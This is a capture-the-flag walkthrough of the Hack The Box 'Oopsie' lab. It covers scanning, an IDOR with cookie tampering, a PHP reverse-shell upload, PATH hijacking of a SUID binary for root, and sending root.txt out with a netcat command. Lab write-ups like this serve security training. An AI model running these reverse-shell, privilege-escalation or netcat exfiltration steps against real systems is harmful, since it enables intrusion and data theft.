# Oopsie Walkthrough
In ours pervious Archetype Walkthrough, I mentioned that the starting point machines are a series of 9 easily rated machines that should be **rooted in a sequence**. So it means, if you need to go through this box, you must have a complete [Archetype](https://shapmanasick.gitbook.io/starting-point-htb/archetype-walkthrough) machine.
Enough talks 🥱, let's start to hack. 🐱💻
{% hint style="danger" %}
> **Disclaimers:** No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱👤
> {% endhint %}
## 00. Start Machine …
To start machine, Just click "Join Machine".
Then you can see the **IP** address for that machine. usually it is **10.10.10.28 🤠**
Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success!
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# ping 10.10.10.28 -c 2
PING 10.10.10.28 (10.10.10.28) 56(84) bytes of data.
64 bytes from 10.10.10.28: icmp_seq=1 ttl=63 time=268 ms
64 bytes from 10.10.10.28: icmp_seq=2 ttl=63 time=282 ms
--- 10.10.10.28 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 267.817/274.911/282.006/7.094 ms
```
As a ping result, It's TTL=63. There is one route between machine and us (VPN) so it's definitely it will be Linux machine.
## 01. Enumeration First …
#### 01.1 Fast ports scan
As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.
```sql
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
```
```
-n : Never do DNS resolution
-vv : Extra verbosity
--open : Output only open ports
-p- : Full TCP ports range (65535)
-T4 : Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network
```
Here is the output 👇
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:28 EDT
Initiating Ping Scan at 05:28
Scanning 10.10.10.28 [4 ports]
Completed Ping Scan at 05:28, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 05:28
Scanning 10.10.10.28 [65535 ports]
Discovered open port 80/tcp on 10.10.10.28
Discovered open port 22/tcp on 10.10.10.28
SYN Stealth Scan Timing: About 31.38% done; ETC: 05:29 (0:01:08 remaining)
Completed SYN Stealth Scan at 05:30, 108.95s elapsed (65535 total ports)
Nmap scan report for 10.10.10.28
Host is up, received echo-reply ttl 63 (0.32s latency).
Scanned at 2021-04-16 05:28:18 EDT for 109s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63 * (Interesting)
80/tcp open http syn-ack ttl 63 * (Interesting)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 109.41 seconds
Raw packets sent: 93007 (4.092MB) | Rcvd: 92692 (3.708MB)
```
Now we know which ports are open, Here we can see some **\* (Interesting)** ports.
#### 01.2 Run Nmap Scripting Engine
To get the best result we can run the `Nmap Scripting Engine` for all open ports. Now we know all the open ports. So we can point out and run the script engine as fast as possible.
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 22,80 10.10.10.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-16 05:33 EDT
Nmap scan report for 10.10.10.28
Host is up (0.39s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| 256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_ 256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.81 seconds
```
I have some trick to identify the Operating System using SSH version. I got it from [IppSec's ](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos)walkthroughs. Thanks [IppSec ](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA/videos)for your valuable walkthroughs 🙏. Here is the trick. If you see the SSH version like "**OpenSSH 7.6p1 Ubuntu 4ubuntu0.3"** just copy it and search through google. In the search results you can find domain called launchpad.net. It contains some important details like Ubuntu Releases, last update, publishing details and more important is builds. Likewise, in this case it is Bionic.
Now we know the operating system is Ubuntu and we have open ports 22 (SSH) and 80 (HTTP). Let's go to the port 80 first.
#### 01.3 Discover more on port 80
Open web browser and Burp Suite. Type
Here we got a nice landing page. First thing first; view source code and look if we have any interesting things. Unfortunately, nothing interesting found. Then we can see the traffic on burp.
In here, you can find some endpoint, so let's jump into it.
But I got nothing, it's just a blank page. Hmm, what about "" ah, let's check...
It contains a login page. lets check basic default username password like,
* admin : admin
* admin : admin123
* admin : password
* admin : pa$$w0rd
Nothing worked.😢 Oh wait, wait.. Do you remember we got some password at the end of Archetype machine? Try to remember, it was "**MEGACORP\_4dm1n!!**". Let's check this one as well.
`admin : MEGACORP_4dm1n!!`
We got our admin panel. and now it's time to check page source. so let's check page source.
Here we have some interesting links. let's check one-by-one.
In upload section they say "if you need to upload anything, please be a superadmin !". hmm ok let's check other ones.
Oh!, now I smell some IDOR vulnerability. Isn't it ?? Let's check ..
I send this request to burp intruder and change settings like below 👇
Let's start the attack.
Above I sorted the output result by the length, There are more users and now I got a super admin Access ID and Email. So let's jump back to the upload section again. But now we intercept the web traffic through burp proxy.
When you refresh the page you can see the cookie contain something like user id and role. so let's alter those values by super admin and then click forward the traffic.
{% hint style="info" %}
I was done this using match and replace method on burp. it will be more quick rather than intercept request one by one.
{% endhint %}
## 02. Foothold
Let's bump to the upload page, and now it accessible.
Let's check whether we can upload PHP web shell or what kind of file type are they need to be uploaded. First copy the PHP Reverse shell to our current directory.
```cpp
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .
```
Then we can open that `php-reverse-shell.php` whatever text editor you like and edit the below changes. 👇
And I rename that file to `hiddenwiki.php`. Let's upload the file.
{% hint style="info" %}
Note : You must change the cookie to super admin do upload the file. but in my case it is auto replace by burp match and replace.
{% endhint %}
File has been uploaded, Now we need to find where the file is.
We have lots of fuzzing tools, but I personally love [Mauro Soria's](https://twitter.com/_maurosoria) [Dirsearch ](https://github.com/maurosoria/dirsearch)tool. it has amazing output and also can customize the script because it was written using python3. For the wordlist I used [Daniel Miessler's](https://danielmiessler.com/) [SecLists](https://github.com/danielmiessler/SecLists).
Now power up the `dirsearch` tool and wait for the results.
```sql
dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
```
From the beginning of the results we got directory called `uploads`.
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# /opt/dirsearch/dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt 1 ⨯
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js, txt, xhtml | HTTP method: GET | Threads: 30 | Wordlist size: 560493
Error Log: /opt/dirsearch/logs/errors-21-04-16_09-31-10.log
Target: http://10.10.10.28/
Output File: /opt/dirsearch/reports/10.10.10.28/_21-04-16_09-31-11.txt
[09:31:11] Starting:
[09:31:16] 403 - 276B - /js/ (Added to queue)
[09:31:16] 301 - 307B - /js -> http://10.10.10.28/js/
[09:31:17] 403 - 276B - /images/ (Added to queue)
[09:31:17] 403 - 276B - /css/ (Added to queue)
[09:31:17] 301 - 308B - /css -> http://10.10.10.28/css/
[09:31:18] 301 - 311B - /images -> http://10.10.10.28/images/
[09:31:18] 301 - 311B - /themes -> http://10.10.10.28/themes/ (Added to queue)
[09:31:18] 403 - 276B - /themes/
[09:31:22] 301 - 312B - /uploads -> http://10.10.10.28/uploads/ (Added to queue)
[09:31:22] 403 - 276B - /uploads/
[09:31:37] 200 - 11KB - /index.php
[09:31:40] 403 - 276B - /fonts/ (Added to queue)
[09:31:40] 301 - 310B - /fonts -> http://10.10.10.28/fonts/
```
Now it's time to powerup netcat listener and we can use curl command to fetch the uploaded file.
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
```
```sql
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# curl http://10.10.10.28/uploads/hiddenwiki.php
```
We land a shell as `www-data` and proceed to upgrade it. Type below command to spawn our shell 👇
```python
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
```python
┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.28] 53294
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
12:18:36 up 5:32, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ pwd
pwd
/
www-data@oopsie:/$
```
First check web user directory where it has some interesting information.
```sql
www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php db.php index.php script.js
```
Here we found `db.php` file in `/var/www/html/cdn-cgi/`login directory. let's view this file.
```sql
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
```
Oh! here we found new user credentials.
* robert:M3g4C0rpUs3r!
So let’s access Robert’s user, providing the password found. `su robert`
```sql
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!
robert@oopsie:/var/www/html/cdn-cgi/login$
```
Yes it works and now we are in robert user. we can view our user flag now. Let's check and submit it to HTB.
```sql
robert@oopsie:~$ cat user.txt
cat user.txt
f2c74*******************b7981
```
## 03. Privilege Escalation
Now we are on the last step. we need to find root flag.
Now we are robert. So again, look around the file system, First we can use `id` command to verify in which user group we are now. Let's check it.
```sql
robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)
```
As above result; we see that this robert is part of a `bugtrack` group. Now let's check for what files this group has the access.
```sql
find / -type f -group bugtracker 2> /dev/null
```
```sql
robert@oopsie:/$ find / -type f -group bugtracker 2> /dev/null
find / -type f -group bugtracker 2> /dev/null
/usr/bin/bugtracker
```
There is a binary file called`bugtracker` and also we notice that it has SUID permissions.
```sql
robert@oopsie:/$ ls -l /usr/bin/bugtracker
ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25 2020 /usr/bin/bugtracker
```
{% hint style="info" %}
The ‘s’ in the user ‘execute’ field, it runs ‘as’ its creator, in this case, root. 😋😋😎
{% endhint %}
Let's run the file and check what are the mess around that file.
```sql
robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 000
000
---------------
cat: /root/reports/000: No such file or directory
```
Nothing interesting found. let's check `strings` command to analyze the binary file for any hard-coded information.
```sql
strings /usr/bin/bugtracker
```
When looking around the output, you can see that it looks like a system command which is calling the `cat` command using the relative path instead of the absolute path. So what's on your mind now. yes we can create malicious file called cat and modifying the path to include the current working directory. Using that method we can abuse this misconfiguration and escalate our privileges to root.
Let's create the file, make it as executable and add the current working directory to PATH.
```sql
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
```
Now let's run the `/usr/bin/bugtracker` binary again.
Now we are landing as root. The last step; let's check the root flag and submit it to the HTB.
{% hint style="info" %}
Here I was unable to view the root.txt flag using cat,vi,nano commands. so instead of view the flag, I'm going to use netcat and get that file to my host.
{% endhint %}
\-- On the receiving end (My host)
```sql
nc -l -p 7878 > root.txt
```
\-- On the sending end (Oopsie machine)
```sql
nc -w 3 destination-ip 7878 < root.txt
```
Here is the output 👇
## 04. Post Exploitation
Inside root's folder, we see a `.config` folder, which contains a `FileZilla` config file with the credentials `ftpuser : mc@F1l3ZilL4` visible in plain text.
That’s all for now! We’ll keep in mind that some of the info collected (like credentials, folders…) can be useful in the next 7 labs of the ‘Starting Point’ path. Thanks for reading and happy hacking!
**Find me on** [@twitter](https://twitter.com/ShapManasick)